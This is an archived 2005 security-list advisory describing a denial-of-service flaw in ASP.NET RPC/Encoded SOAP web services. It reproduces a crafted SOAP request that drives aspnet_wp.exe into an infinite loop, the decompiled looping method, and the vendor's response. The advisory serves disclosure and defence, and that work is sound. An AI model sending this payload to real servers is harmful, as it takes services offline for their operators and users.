[NT] ASP.NET RCP/Encoded Web Service DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 07/21/05
- Previous message: SecuriTeam: "[UNIX] Web Portal System Command Execution Vulnerability (wps_shop.cgi)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 21 Jul 2005 13:55:41 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ASP.NET RCP/Encoded Web Service DoS
------------------------------------------------------------------------
SUMMARY
By sending a custom SOAP message to an RCP/Encoded web method attackers
can cause a denial of service in Microsoft's ASP.NET enviroment.
DETAILS
By sending a custom SOAP message to an RCP/Encoded web method that accepts
an array (or any object derived from Ilist, like StringCollection or
ArrayList), attackers can cause the aspnet_wp.exe process to consume 100%
of the system resources.
If the system is a bit faster, you may add more then one request in order
to cause the DoS condition.
To replicate the issue, attackers can send a request to the Test(int[]
someList) web method defined inside the AspCrashWebService project (refer
to AspCrashWebService.zip distributed with this document). A normal SOAP
message to call this method with a single element of 0 would look like:
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<tns:Test>
<someList href="#id1" />
</tns:Test>
<soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]">
<Item>0</Item>
</soapenc:Array>
</soap:Body>
</soap:Envelope>
If attackers changes the <soapenc:Array> definition with the complex type
defined in demo ASPCrashWebService.Service1 WSDL definition (ArrayOfInt),
attackers will cause the problem in aspnet_wp.exe.
The new request would look like:
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<tns:Test>
<someList href="#id1" />
</tns:Test>
<tns:ArrayOfInt>
<Item>0</Item>
</tns:ArrayOfint>
</soap:Body>
</soap:Envelope>
The error is caused due to an infinite loop inside
System.Xml.Serialization.Xml.XmlSerializationReader.ReadReferencedElements
(). The method can be translated to the following code:
protected void ReadReferencedElements()
{
string V_0;
r.MoveToContent();
while (r.NodeType != XmlNodeType.EndElement && r.NodeType !=
XmlNodeType.None)
{
ReadReferencingElement(null, null, true, out V_0);
r.MoveToContent();
}
DoFixups();
HandleUnreferencedObjects();
}
The problem is that after the call to ReadRefencingElement() the
r.NodeType is set to XmlNodeType.Element and the while loop never
terminates.
Vendor Status:
RCP/Encoded web services are not recommended by Microsoft. Developers
should utilize document/literal instead, which is not affected by this
issue. The Microsoft Security Response Center has stated that this issue
will be addressed in the upcoming "Whidbey" release of Web Services. In
the interim, the aspnet_wp.exe service can be restarted and operation will
resume without problems.
ADDITIONAL INFORMATION
The information has been provided by <mailto:spilabs@spidynamics.com> SPI
Labs.
The original article can be found at:
<http://www.spidynamics.com/spilabs/advisories/aspRCP.html>
http://www.spidynamics.com/spilabs/advisories/aspRCP.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Web Portal System Command Execution Vulnerability (wps_shop.cgi)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
